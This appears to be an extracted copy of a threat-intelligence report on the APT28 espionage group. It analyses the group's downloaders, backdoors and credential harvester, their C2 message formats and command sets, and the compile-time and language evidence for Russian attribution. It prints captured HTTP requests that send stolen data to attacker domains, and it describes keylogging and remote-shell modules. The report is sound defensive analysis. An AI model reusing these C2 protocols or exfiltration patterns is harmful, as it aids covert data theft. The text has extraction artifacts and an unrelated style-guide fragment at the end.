• APT28 has employed RSA encryption to
protect files and stolen information moved
from the victim’s network to the controller.
APT28 has made incremental and systematic
changes to the SOURFACE downloader and its
surrounding ecosystem since as early as 2007.
These changes indicate a long-standing and
dedicated development effort behind APT28. We
have observed samples of the SOURFACE
downloader compiled between 2007 and 2014.
We call SOURFACE (samples are frequently
named netids.dll) a first stage downloader
because its primary job is to retrieve a second
stage payload from a C2 server. Until 2013, the
SOURFACE downloader used hard-coded IP
addresses for C2 communications, whereas the
future CORESHELL samples use domains.
EVOLUTION OF
SOURFACE ECOSYSTEM
INDICATES SYSTEMATIC DEVELOPMENT
39. WHAT IS A MALWARE ECOSYSTEM?
First, a malware family is a collection of malware in which each
sample shares a significant
amount of code with all of the others. There are exceptions: for
example, some files
contain public and standard code libraries that we do not take
into consideration
when making a family determination.
A malware ecosystem is a group of malware families that work
together to perform
the same objective. Perhaps the simplest and most typical
ecosystem
is a dropper and a backdoor that are used together. They may
not share the
same code structure, but they are related because one drops and
installs
the other.
The ecosystem surrounding the SOURFACE downloader
frequently
consists of a dropper, which installs SOURFACE. The
SOURFACE
downloader then receives another dropper from its C2 server,
and
this second dropper installs a second stage backdoor, which is
usually EVILTOSS.
22 fireeye.com
40. APT 28: A Window into Russia’s Cyber Espionage Operations?
In April 2013, based on compile time, the group
began to make significant alterations to the
SOURFACE downloader. They started by
changing the compiled DLL name to “coreshell.dll”
and making minor changes to the network
communications, as seen in Figure 7.
The hostname, volume serial number and OS
version data are encoded in the new URL format.
As seen in the table below, the SOURFACE/
CORESHELL developers also made other
modifications that changed the exported function
name and file size over time.
17 SOURFACE with minor changes to network communications
(see Figure 7).
18 Basic anti-debug measures added (process listing, rand
timing, is DebuggerPresent).
19 Switches from loading a secondary DLL
(netui.dll/WinIDS.dll) to uploading the contents of
%temp%chkdbg.log.
20 Statically links msvcrt library.
21 Statically links msvcrt library and the strings used to
identify the imported libraries and functions are reversed prior
to being used, then reversed back after use.
22This version added assembly level obfuscation, which slows
down analysis. This variant requires the OS to be at least
Windows Vista.
Table 4: Evolution of SOURFACE downloader over time
MD5 Size Compile Date Export Name Notes
272f0fde35dbdfccbca1e33373b3570d 11264 2013-04-16
41. 10:49:25 UTC Init1 17
8b92fe86c5b7a9e34f433a6fbac8bc3a 14848 2013-08-06
07:53:03 UTC Initialize 18
9eebfebe3987fec3c395594dc57a0c4c 12800 2013-08-14
10:48:59 UTC Initialize 19
da2a657dc69d7320f2ffc87013f257ad 12800 2013-08-21
07:52:10 UTC Initialize Same as previous.
1259c4fe5efd9bf07fc4c78466f2dd09 12800 2013-10-03
09:21:10 UTC Initialize Same as previous.
3b0ecd011500f61237c205834db0e13a 43520 2014-02-13
16:29:36 UTC Applicate 20
5882fda97fdf78b47081cc4105d44f7c 45056 2014-05-13
15:18:24 UTC Applicate 21
791428601ad12b9230b9ace4f2138713 45056 2014-05-13
16:42:26 UTC Applicate Same as previous.
ead4ec18ebce6890d20757bb9f5285b1 45056 2014-07-25
15:44:04 UTC Applicate Same as previous.
48656a93f9ba39410763a2196aabc67f 112640 2014-07-30
11:13:24 UTC Applicate 22
8c4fa713c5e2b009114adda758adc445 112640 2014-07-30
11:13:24 UTC Applicate Same as previous.
Figure 7: Example of modified SOURFACE vs. CORESHELL
communications
SOURFACE URL for a sample compiled April 2013:
42. http://[hostname]/~book/cgi-bin/brvc.cgi?WINXPSP3c95b87a4-
05_01
CORESHELL URL for a sample compiled April 2013:
http://[hostname]/~xh/ch.cgi?enhkZm1GNmY1YWg0eGcxMGQ
1MDUwMQ==
23 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
Figure 8: NATO-themed decoy
delivered with possible EVILTOSS
predecessor from 2004
Variants of the SOURFACE second stage
backdoor, EVILTOSS, share some code similarities
with SOURFACE. However, it contains more
capabilities, including the ability to provide access
to the file system and registry, enumerate network
resources, create processes, log keystrokes, access
stored credentials, and execute shellcode. The
backdoor encrypts data that it uploads with an RSA
public key. Many of its variants we have seen are
named netui.dll. EVILTOSS variants may use the
Simple Mail Transfer Protocol (SMTP) to send
stolen data in an attachment named “detaluri.
dat”. The backdoor attaches this file to a
preformatted email and sends it out through a
victim’s mail server.
Interestingly, we found an antivirus report from
200423 detailing what appears to be an early
variant of EVILTOSS. The backdoor was installed
43. alongside the NATO-themed decoy document
depicted in Figure 8. The backdoor sent data via
SMTP to [email protected][.]ru and received its
tasking via POP from [email protected][.]ru.
Although we have not conclusively attributed
this sample to APT28, it does suggest the
possibility that APT28 has been operating since
as early as 2004.24
23
http://ae.norton.com/security_response/print_writeup.jsp?docid
=2004-081915-1004-99
24 Although the malware family and interest in NATO make it
likely that APT28 was involved, we cannot conclusively
attribute this sample to APT28 based on
these factors alone. We have no evidence that they controlled
the C2 for this malware or were using EVILTOSS in 2004.
APT28 could have possibly obtained
this source code from another group of actors. Also, malware
can be passed from group to group. The other malware that we
associate with APT28 in this
paper is more strongly attributed to the group using additional
factors, some of which we mention in Appendix A.
In April 2013, based on compile time, the
group began to make significant alterations to
the SOURFACE downloader.
24 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
44. D
uring our research, we discovered that
APT28 uses a backdoor developed using a
modular framework. We call this
backdoor CHOPSTICK, a somewhat ironic name
that comes from our semi-random name
generator. The modular design allows flexible
options for compiling variants with different
capabilities as needed, as well as deploying
additional capabilities at runtime. This allows the
developers to make targeted implants, including
only the capabilities and protocols necessary for a
specific environment. Such a modular framework
suggests the group has had an organized
development effort since as early as 2007. A
formal development environment, in which code is
versioned and well-organized, would almost
certainly be required to track and define the
various modules that can be included in the
backdoor at compile time.
CHOPSTICK variants may move messages and
information using at least three methods:
1. Communications with a C2 server using
HTTP. These protocols are covered in more
detail in Appendix D.
2. Email sent through a specified mail server.
One CHOPSTICK v1 variant contained
modules and functions for collecting
keystroke logs, Microsoft Office documents,
and PGP files. The monitoring for new files of
interest is performed by a “Directory
45. Observer” module. In one sample this
information was intended to be sent via
SMTP using a Georgian MIA mail server. It
used one of four embedded sender email
addresses (@mia.gov.ge) to send files via
email to another email address on the same
mail server. All information required for the
email was hardcoded in the backdoor.
3. Local copying to defeat closed networks.
One variant of CHOPSTICK focuses on
apparent air gap / closed network capabilities
by routing messages between local
directories, the registry and USB drives.
A modular development framework
suggests the group has had an organized
development effort since as early as 2007.
MODULAR IMPLANTS
INDICATE A FORMAL
DEVELOPMENT
ENVIRONMENT
25 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
D
uring our research into APT28’s malware,
we noted two details consistent across
malware samples. The first was that
APT28 had consistently compiled Russian language
46. settings into their malware. The second was that
malware compile times from 2007 to 2014
corresponded to normal business hours in the UTC
+ 4 time zone, which includes major Russian cities
such as Moscow and St. Petersburg.
Use of Russian and English Language
Settings in PE Resources
PE resources include language information that
can be helpful if a developer wants to show user
interface items in a specific language.25 Non-default
language settings packaged with PE resources are
dependent on the developer’s build environment.
Each PE resource includes a “locale” identifier with
a language ID “composed of a primary language
identifier indicating the language and a sublanguage
identifier indicating the country/region.”26
At the time of the writing of this paper, we had
identified 103 malware samples that were both
attributed to APT28 and contained PE resources.
Table 5 shows the locale identifiers27 with
associated language and country/region for
these samples.
Table 5: Locale and language identifiers associated with APT28
malware
Locale ID Primary language Country/Region Number of APT28
samples
0x0419 Russian (ru) Russia (RU) 59
0x0409 English (en) United States (US) 27
47. 0x0000 or 0x0800 Neutral locale / System default locale
language Neutral 16
0x0809 English (en) United Kingdom (GB) 1
APT28 MALWARE
INDICATES RUSSIAN
SPEAKERS IN A
RUSSIAN TIME ZONE
25Microsoft Developer Network – Multiple Language Resources
http://msdn.microsoft.com/en-us/library/cc194810.aspx
26, 27 Microsoft Developer Network – Language Identifier
Constants and Strings http://msdn.microsoft.com/en-
us/library/dd318693.aspx
26 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
The samples with Russian language settings were
compiled between late 2007 and late 2013, as
depicted in Figure 9. This consistency over a
long timeframe suggests that the developers of
APT28 malware were using a build environment
Figure 9: Number of APT28 samples with Russian language
settings by compile month
2007
2008
2009
50. the time and made no effort to obscure this
detail. Overall, the locale IDs suggest that
APT28 developers can operate in both Russian
and English.
27 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
Compile Times Align with Working
Hours in Moscow and St. Petersburg
Of the 140 malware samples that we have
attributed to APT28 so far, over 89% were
compiled between 0400 and 1400 UTC time, as
depicted in Figure 10. Over 96% were compiled
between Monday and Friday. This parallels the
working hours in UTC+0400 (that is, compile
times begin about 8AM and end about 6PM in this
time zone). This time zone includes major Russian
cities such as Moscow and St. Petersburg.
Figure 10: Compile Times of APT28 malware in UTC Time
0 1 2 3 4 5 6 7 8 9 10
11 12 13 14 15 16 17 18 19 20 21
22 23 24
FR
EQ
U
EN
C
51. Y
20
18
16
14
12
10
8
6
4
2
Moscow business hours
TIME OF DAY (UTC)
13:00 14:00 15:00 16:00
28 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
We started researching APT28 based on activity
we observed on our clients’ networks, similar to
52. other targeted threat groups we have identified
over time. We assess that APT28 is most likely
sponsored by the Russian government. We
summarize our key observations about APT28 in
Figure 11 below.
APT28’s characteristics—their targeting, malware,
language, and working hours—have led us to
conclude that we are tracking a focused, long-
standing espionage effort. Given the available
data, we assess that APT28’s work is sponsored
by the Russian government.
CONCLUSION
MALWARE
Evolves and Maintains Tools for Continued, Long-Term Use
• Uses malware with flexible and lasting platforms
• Constantly evolves malware samples for continued use
• Malware is tailored to specific victims’ environments, and
is designed to hamper reverse engineering efforts
• Development in a formal code development environment
Various Data Theft Techniques
• Backdoors using HTTP protocol
• Backdoors using victim mail server
• Local copying to defeat closed/air gapped networks
TARGETING
Georgia and the Caucasus
• Ministry of Internal Affairs
• Ministry of Defense
• Journalist writing on Caucasus issues
• Kavkaz Center
Eastern European Governments & Militaries
53. • Polish Government
• Hungarian Government
• Ministry of Foreign Affairs in Eastern Europe
• Baltic Host exercises
Security-related Organizations
• NATO
• OSCE
• Defense attaches
• Defense events and exhibitions
RUSSIAN ATTRIBUTES
Russian Language Indicators
• Consistent use of Russian language in malware over a
period of six years
• Lure to journalist writing on Caucasus issues suggests
APT28 understands both Russian and English
Malware Compile Times Correspond to Work Day in Moscow’s
Time Zone
• Consistent among APT28 samples with compile times
from 2007 to 2014
• The compile times align with the standard workday in the
UTC + 4 time zone which includes major Russian cities such
as Moscow and St. Petersburg
Figure 11: Summary of key observations about APT28
29 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
APPENDIX A:
54. DISTINGUISHING
THREAT GROUPS
We use the term “threat group” to refer to actors
who work together to target and penetrate
networks of interest. These individuals may share
the same set of tasks, coordinate targets, and
share tools and methodology. They work together
to gain access to their targets and steal data.
The art of attributing disparate intrusion activities
to the same threat group is not always simple.
Different groups may use similar intrusion
methodologies and common tools, particularly
those that are widely available on the Internet,
such as pwdump, HTran, or Gh0st RAT. There may
be overlaps between groups caused by the sharing
of malware or exploits they have authored, or
even the sharing of personnel. Individual threat
actors may move between groups either
temporarily or permanently. A threat actor may
also be a private citizen who is hired by multiple
groups. Multiple groups, on occasion, compromise
the same target within the same timeframe.
Distinguishing one threat group from another is
possible with enough information, analytical
experience, and tools to piece it all together. We
can analyze multiple incidents and tell by the
evidence left behind that a given incident was the
result of one threat group and not another.
Threat actors leave behind various forensic
details. They may send spear phishing emails from
a specific IP address or email address. Their emails
may contain certain patterns; files have specific
55. names, MD5 hashes, timestamps, custom
functions, and encryption algorithms. Their
backdoors may have command and control IP
addresses or domain names embedded. These are
just a few examples of the myriad of forensic
details that we consider when distinguishing one
threat group from another.
At the most basic level, we say that two intrusion
events are attributed to the same group when we
have collected enough indicators to show beyond
a reasonable doubt that the same actor or group
of actors were involved. We track all of the
indicators and significant linkages associated with
identified threat groups in a proprietary database
that comprises millions of nodes and linkages
between them. In this way, we can always go back
and answer “why” we associated cyber threat
activity with a particular group.
30 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
APPENDIX B:
TIMELINE OF
APT28 LURES
YEAR LURE TOPIC MALWARE
2010 Iran’s work with an international organization (internal
document) SOURFACE
2011 File named “military cooperation.doc” SOURFACE,
56. OLDBAIT
2011 Georgian language IT document for Ministry of Internal
Affairs (internal document) SOURFACE
2011 “USB Disk Security is the best software to block threats
that can damage your PC or compromise your personal
information via USB storage.” SOURFACE
2012 Food security in Africa (“Food and nutrition crisis reaches
peak but good forecast for 2013”) SOURFACE
2012 “IDF Soldier Killed and another injured in a Terror
Attack” SOURFACE
2012 “Echo Crisis Report” on Portugal’s forest fires
SOURFACE
2012 “FBI to monitor Facebook, Twitter, Myspace”
SOURFACE
2012 Georgia (US state, not the country of Georgia) murder
case uncovers terror plot SOURFACE
2012 Military attaches in London (internal document)
SOURFACE
2013 South Africa MFA document CHOPSTICK, CORESHELL
2013 John Shalikashvili (Georgian-Polish-American US
General) Questionnaire CORESHELL
2013 Asia Pacific Economic Cooperation Summit 2013 reporters
(internal document) SOURFACE
2013 Defense Attaches in Turkey (internal document)
57. CHOPSTICK, CORESHELL
2013 Turkish Cypriot news about Syria chemical weapons
CHOPSTICK, CORESHELL
2013 Georgian language document about drivers’ licenses
(internal document) EVILTOSS
2013 Apparent Reason Magazine-related lure sent to a journalist
CORESHELL
2014 Mandarin language document, possibly related to a
Chinese aviation group (non-public document) CORESHELL
2014 Netherlands-Malaysia cessation of hostilities; related to
Ukraine airline attack CORESHELL
31 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
SOURFACE is a downloader that obtains a second
stage backdoor from a C2 server. Over time the
downloader has evolved and the newer versions,
usually compiled with the DLL name ‘coreshell.dll’,
are distinct enough from the older versions that
we refer to it as SOURFACE/CORESHELL or
simply CORESHELL. This appendix focuses on
these newer versions.
CORESHELL uses two threads to communicate
with its C2 server. The first thread sends beacons
that contain the process listing of the
compromised host. The second thread is
58. responsible for downloading and executing stage
APPENDIX C:
SOURFACE/CORESHELL
two payloads. Messages are sent using HTTP
POST requests whose bodies contain encrypted
and Base64 encoded data. The encryption
algorithm is a custom stream cipher using a
six-byte key. Commands from the controller to the
CORESHELL implant are encrypted using another
stream cipher but this time using an eight-byte
key. CORESHELL has used the same user agent
string (“MSIE 8.0”) that SOURFACE previously
used, but in more recent samples CORESHELL
uses the default Internet Explorer user agent
string obtained from the system. Figure 11 shows
an example POST request.
Figure 11: Example CORESHELL POST request
POST /check/ HTTP/1.1
User-Agent: MSIE 8.0
Host: adawareblock.com
Content-Length: 58
Cache-Control: no-cache
zXeuYq+sq2m1a5HcqyC5Zd6yrC2WNYL989WCHse9qO6c7po
wrOUh5KY=
59. 32 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
When Base64 decoded, the POST content looks like this:
00000000 cd 77 ae 62 af ac ab 69 b5 6b 91 dc ab 20 b9 65
.w.b...i.k... .e
00000010 de b2 ac 2d 96 35 82 fd f3 d5 82 1e c7 bd a8 ee ...-
.5..........
00000020 9c ee 9a 30 ac e5 21 e4 a6 ...0..!..
The key used to encrypt the message is six bytes long and is
appended to the end of the message. In this is
example the key would be: 30 ac e5 21 e4 a6. When the message
is decrypted, the resulting plaintext is:
00000000 00 72 68 64 6e 7a 78 64 66 6d 46 36 66 35 61 68
.rhdnzxdfmF6f5ah
00000010 34 78 67 30 34 30 33 30 35 30 31 1a 00 00 00 23
4xg04030501....#
00000020 00 00 00 ...
The following table contains a breakdown of each of the field’s
C2 message.
Table 6: Example CORESHELL beacon structure
Offset Value Description
00 00 Command byte:
0 - Command request
1 - Process listing
01 “rhdn” Unknown - Potentially a campaign identifier. Values
60. seen so far: “rhze”, “rhdn” and “mtfs”.
05 “zxdfmF6f5ah4xg” Hostname of compromised system
13 “0403” Unknown - Potentially a version number. This
number is hardcoded within the implant.
17 “05” OS Major version
19 “01” OS Minor version
1B 0x0000001a Header length minus the command byte (LE
DWORD)
1F 0x00000023 Length of the entire message (LE DWORD)
33 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
Commands are sent from the C2 server to the CORESHELL
backdoor in HTTP responses to the POST
requests. The command is identified by the NULL terminated
UNICODE string “OK” (Ox00Kx00x00
x00). The command is Base64 encoded and immediately follows
the “OK” string. Figure 12 shows a
sample CORESHELL command:
The Base64 decoded string is:
00000000 01 00 00 00 AA AA 01 01 01 01 01 01 01 01 10 41
........ .......A
00000010 70 41 10 42 33 42 D3 43 F2 43 92 44 B5 44 55 45
pA.B3B.C .C.D.DUE
61. 00000020 74 45 14 46 37 46 D7 tE.F7F.
The following table contains a description of each field in the
command message:
Figure 12: Example CORESHELL controller response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 58
O.K...AQAAAKqqAQEBAQEBAQEVzPMEUUIzQtND8kOSRL
VEVUV0RRRGN0bX
Table 7: CORESHELL C2 message structure
Offset Value Description
00 0x00000001 Constant value, must be set to 1 (LE DWORD)
04 AA AA Unknown - not referenced
06 01 01 01 01 01 01 01 01 Encryption key (8 bytes)
0E 10 41 70 41 10 42 33... Encrypted command
34 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
When the above command “10 41 70 41 10 42 33…” is
decrypted using the key “01 01 01 01 01
01 01 01” the following command message is produced:
62. 00000000 04 CC C2 04 00 42 42 42 42 43 43 43 43 44 44 44
.....BBBBCCCCDDD
00000010 44 45 45 45 45 46 46 46 46
DEEEEFFFF
The implant supports the following four command identifiers
from the controller as seen in Table 8. The
first byte of the command message specifies the command type
and is immediately followed by the PE or
shellcode to be executed. In this example the command byte is
04 indicating the following bytes are
shellcode. If the command byte was 01, 02, or 03 the following
bytes would be a DLL or EXE that would
be written to disk and executed.
Table 8: CORESHELL commands
Command ID Description
01 Save command data as %LOCALAPPDATA%svchost.exe
and execute using CreateProcess.
02 Save command data as %LOCALAPPDATA%conhost.dll
and execute using “rundll32.exe ”%s”,#1”.
03 Save command data as %LOCALAPPDATA%conhost.dll
and execute using LoadLibrary.
04 Command data is a shell code and is executed using
CreateThread.
35 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
63. CHOPSTICK is a backdoor that uses a modularized, object-
oriented framework written in C++. This
framework allows for a diverse set of capabilities across
malware variants sharing a common code base.
CHOPSTICK may communicate with external servers using
SMTP or HTTP. This appendix documents
variants using HTTP communications.
The first time CHOPSTICK is executed, it may encrypt and
store configuration data in the Registry key
HKUS-1-5-
19_ClassesSoftwareMicrosoftMediaPlayer{E6696105-E63E-
4EF1-939E-
15DDD83B669A}chnnl. The user HKUS-1-5-19 corresponds
to the LOCAL_SERVICE account SID.
The configuration block is encrypted using RC4 encryption. The
key is a combination of a 50-byte static
key and a four-byte salt value randomly generated at runtime.
The static key is derived from opcodes in
the backdoor.
CHOPSTICK collects detailed information from the host
including the Windows version, CPU
architecture, Windows Firewall state, User Account Control
(UAC) configuration settings on Windows
Vista and above and Internet Explorer settings. It also tests for
the installation of specific security
products (Table 9) and applications (Table 10).
Table 9: Endpoint security products detected by CHOPSTICK
Service Name Security Product
Acssrv Agnitum Client Security
64. AVP Kaspersky
SepMasterService Symantec
McAfeeService McAfee
AntiVirService Avira
Ekrn ESET
DrWebAVService Dr. Web Enterprise Security
MBAMService Malwarebytes Anti-Malware
APPENDIX D:
CHOPSTICK
36 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
Table 10: Applications detected by CHOPSTICK
Process Name Application
firefox.exe Mozilla Firefox
iexplore.exe Internet Explorer
outlook.exe Microsoft Outlook
opera.exe Opera Browser
65. bat.exe Unknown
msimn.exe Outlook Express
vpngui.exe Cisco Anyconnect VPN client
ipseca.exe IPsec VPN client
ipsecc.exe IPsec VPN client
openvpn.exe OpenVPN client
openssl.exe OpenSSL
openvpn-gui-1.0.3.exe OpenVPN client
msmsgs.exe Microsoft Messenger
wuauclt.exe Windows Update
chrome.exe Google Chrome Browser
thebat.exe The Bat Secure Email Client
skype.exe Skype Messenger
37 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
After collecting host information, CHOPSTICK creates a hidden
file that may be named
%ALLUSERSPROFILE%edg6EF885E2.tmp for temporary
storage and creates a Windows mailslot with the
66. name “check_mes_v5555”.28 Its usage of a Windows mailslot
would potentially allow external binaries to
write data to the “check_mes_v5555” mailslot, possibly
allowing CHOPSTICK to encrypt and store
output from other malware. It creates a thread that records user
activity on the host, capturing desktop
screenshots in JPEG format, tracks current window focus,
collects keystrokes, and scrapes window
contents (text, context menus, etc.). User activity is captured
once every 500 milliseconds and logged in
an HTML-like format. The thread writes user activity log
messages to the “check_mes_v5555” mailslot in
plain text. CHOPSTICK reads messages from the mailslot,
encrypts them using RC4, and then stores the
encrypted message in an edg6EF885E2.tmp temporary file. The
RC4 encryption used here also uses a 50-
byte static key plus four-byte random salt value.
After approximately 60 seconds of execution time, CHOPSTICK
begins communicating with one of its C2
servers over HTTP. After sending an initial HTTP GET request
it uploads the file contents of edg6EF885E2.
tmp to the C2 server using HTTP POST requests. It does not
wait for a response from the server to begin
uploading. Once the contents of edg6EF885E2.tmp are
uploaded, CHOPSTICK deletes the file. Figure 13
below contains an example of an HTTP POST request uploading
a segment from edg6EF885E2.tmp.
Figure 13: Sample CHOPSTICK v2 HTTP POST
POST /search/?btnG=D-
3U5vY&utm=79iNI&ai=NPVUnAZf8FneZ2e_qptjzwH1Q&PG3
pt=n-
B9onK2KCi HTTP/1.1
Accept:
67. text/html,application/xhtml+xml,application/xml;q=0.9,*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0)
Gecko/20100101
Firefox/20.0
Host: windows-updater.com
Content-Length: 77
Cache-Control: no-cache
1b2x7F4Rsi8_e4N_sYYpu1m7AJcgN6BzDpQYv1P2piFBLBqgh
XiHY3SIfe8cUHHYojeXfeyyOhw==
28A mailslot is a Windows inter-process communication (IPC)
mechanism similar to a named pipe, but is designed for one-way
communications between
processes and can also be used across the network.
38 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
CHOPSTICK uses a URL-safe Base64 encoding, using an
alphabet that substitutes “+” and “/” for “-” and
“_”, respectively. Each HTTP request contains multiple Base64
encoded URL parameters, however only
one parameter contains information encoded by the malware
(“ai=”) and the rest of the URL parameters
appear to be randomly generated per request.
CHOPSTICK encrypts an 11-byte sequence in the “ai=”
parameter. The purpose of this parameter
appears to be to uniquely identify the particular instance of the
68. backdoor to the C2 server. The Base64
encoded text of this parameter begins with a number of
randomly generated alphabetical characters
presumably intended to prevent people from Base64 decoding
the whole string without some knowledge
of how the malware family works. The first four bytes of the
message are an XOR key for the remainder of
the data. Once decrypted using the XOR key, an 11-byte
sequence is revealed. The first seven bytes are
static, and are hard-coded in CHOPSTICK, while the last four
bytes appear to be unique.
The message body of the POST request is also Base64 encoded.
This encoded string is also prefixed with
random characters designed to break the output of a Base64
decode operation on the entire string. The
first 15 bytes of the decoded message body comprise another
11-byte sequence similar to the sequence
stored in the “ai=” parameter as described above. Decrypting
these bytes yields another static seven-byte
sequence, followed by four unique bytes. The remainder of the
message body consists of the RC4
encrypted data containing the HTML-formatted user activity
log, edg6EF885E2.tmp.
After uploading edg6EF885E2.tmp, CHOPSTICK continues to
query its C2 servers for commands using
HTTP GET requests. The malware contains code which allows it
to load or memory-map external modules
that export the following functions: SendRawPacket,
GetRawPacket, InitializeExp, DestroyExp,
IsActiveChannel, GetChannelInfo, SetChannelInfo, Run,
GetModuleInfo, GiveMessage,
and TakeMessage.
69. 39 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
Modularity
CHOPSTICK backdoors are compiled within a modularized
development framework. This means that
two separate CHOPSTICK backdoors may contain vastly
different functionality, depending on which
modules were included at compile time. The modules that are
included in an instance of CHOPSTICK
may be reported to the C2 server as part of POST messages.
Figure 14 includes an example from a
CHOPSTICK v1 variant:
Figure 14: Sample CHOPSTICK v1 HTTP POST including
module identification
POST
/webhp?rel=psy&hl=7&ai=d2SSzFKlR4l0dRd_ZdyiwE17aTzOP
eP-PVsYh1lVAXpLhIebB4=
HTTP/1.1
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.
8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0)
Gecko/20100101
Firefox/20.0
Host: adobeincorp.com
Content-Length: 71
Cache-Control: no-cache
d2SSzFKchH9IvjcM55eQCTbMbVAU7mR0IK6pNOrbFoF7Br0
70. Pi__0u3Sf1Oh30_HufqHiDU=
40 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
To decode the POST content, the first step is to remove
characters from the Base64 string (the number of
characters to remove may vary between different
communication channels). In the example from Figure
14, the number of characters removed is seven. Once these
characters are removed the decoded (but
still encrypted) text looks like this:
00000000 72 11 fd 22 f8 dc 33 9e 5e 40 24 db 31 b5 40 53
r..”..3.^@[email protected]
00000010 b9 91 d0 82 ba a4 d3 ab 6c 5a 05 ec 1a f4 3e 2f
........lZ....>/
00000020 ff d2 ed d2 7f 53 a1 df 4f c7 b9 fa 87 88 35
.....S..O.....5
The first two words (“72 11” and “fd 22”) are checksums that
are used to validate the message. The next 4
bytes “f8 dc 33 9e” are a salt value that is appended to the end
of an RC4 key. Once decrypted, the
message looks like the following:
00000000 72 11 fd 22 f8 dc 33 9e 56 34 4d 47 4e 78 5a 57
r..”..3.V4MGNxZW
00000010 6c 76 63 6d 68 6a 4f 47 39 79 5a 51 3d 3c 3c ee
lvcmhjOG9yZQ=<<.
00000020 01 00 00 01 00 23 01 10 23 01 11 23 01 13 23
.....#..#..#..#
71. The strings “V4MGNxZWlvcmhjOG9yZQ” and “=<<xee” are
hardcoded in the implant. The module
information starts at offset 0x20 with the string “01 00 00” and
is formatted as follows:
Table 11: Example CHOPSTICK v1 message format
Offset Value Description
00 0x0001 Message from the AgentKernel v1
02 00 Command ID
03 01 00 23 01 10 23 01 11 23 01 13 23 List of modules
included in the implant
separated by a ‘#’ character
41 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
The modules included in this CHOPSTICK v1 implant are:
Our determination of a CHOPSTICK “v1” versus “v2” is based
on the self-identification of the kernel ID
and associated modules. Compare the list of CHOPSTICK v1
modules in Table 12 with the list of modules
in an example CHOPSTICK v2 variant in Table 13:
Table 12: Example CHOPSTICK v1 module list
Module ID Internal Module Name Description
0x0001 AgentKernel Kernel, probably version 1. Handles
72. communication between modules and C2
tunnels.
0x1001 modKey Logs keystrokes and takes screen captures.
0x1101 modFS Facilitates file system access, such as directory
browsing along with reading,
deleting and opening files.
0x1301 modProcRet Remote command shell access.
Table 13: Example CHOPSTICK v2 module list
Module ID Internal Module Name Description
0x0002 kernel Kernel, probably version 2. Handles
communication between modules and C2
tunnels.
0x1002 Logs keystrokes and takes screen captures.
0x1102 Facilitates filesystem access, such as directory browsing
along with reading,
deleting and opening files.
0x1302 Remote command shell access.
0x1602 Load additional DLLs.
42 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
The kernel IDs 0x0001 and 0x0002 indicate different versions.
73. The corresponding modules in each
backdoor also are consistently identified with 0x01 and 0x02,
respectively, in the second byte. In both
variants the modules with keystroke log, file system access, and
command shell capabilities have the
consistent identifiers 0x10, 0x11, and 0x13, respectively, in the
first byte. This suggests that the first byte
in the module ID identifies the module type whereas the second
byte identifies the kernel version.
The kernel sends commands to each module using its module
ID. The commands that each module
understands are likely consistent from build to build. Table 14
and Table 15 show examples of commands
that each module understands.
Table 14: Commands understood by modFS (0x1101) module
Command ID Description Example
01 Find file x01x11x01Directory&file&[01]
02 Read file x01x11x02Directory&file&[01]
03 Write file x01x11x03Directory&file&[Contents]
04 Delete file x01x11x04Directory&file&[01]
05 Execute file x01x11x05Directory&file&[01]
Table 15: Commands understood by modProcRet (0x1301)
module
Command ID Description Example
00 CMD.exe output x01x13x00[Output]
74. 01 CMD.exe start x01x13x01
02 CMD.exe exit x01x13x02
11 CMD.exe input x01x13x11[Input]
43 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
OLDBAIT is a credential harvester that installs itself in
%ALLUSERPROFILE%Application Data
MicrosoftMediaPlayerupdatewindws.exe. There is a missing
space in the MediaPlayer directory and
the filename is missing the ‘o’ character. Both the internal
strings and logic are obfuscated and are
unpacked at startup. Credentials for the following applications
are collected:
• Internet Explorer
• Mozilla Firefox
• Eudora
• The Bat! (an email client made by a Moldovan company)
• Becky! (an email client made by a Japanese company)
Both email and HTTP can be used to send out the collected
credentials. Sample HTTP traffic is
displayed in Figure 15.
Figure 15: Example OLDBAIT HTTP traffic
POST /index.php HTTP/1.0
Accept: text/html
75. Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Content-Length: 6482
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1)
Host: windous.kz
Connection: Keep-Alive
Pragma: no-cache
prefs=C789Cu0Zacq7acr0D7LUawy6CY4REIaZBciWc6yVCN--
cut--
APPENDIX E:
OLDBAIT
44 fireeye.com
APT 28: A Window into Russia’s Cyber Espionage Operations?
OLDBAIT handles APIs very similarly to SOURFACE and
EVILTOSS. There is a setup routine that loads
the imports into a table and all API calls reference an index to
this table. In SOURFACE and EVILTOSS the
table is stored in a global variable while in OLDBAIT this table
is allocated at runtime and a pointer is
passed between functions.
Figure 16: Example OLDBAIT SMTP traffic
From: [email protected]
To: [email protected]
Subject: photo(9a3d8ea4-test)
Date: Tue, 23 Sep 2014 15:42:56 -0500
MIME-Version: 1.0
77. MLA 8th Edition Formatting and Style Guide
Purdue OWL Staff
Brought to you in cooperation with the Purdue Online Writing
Lab
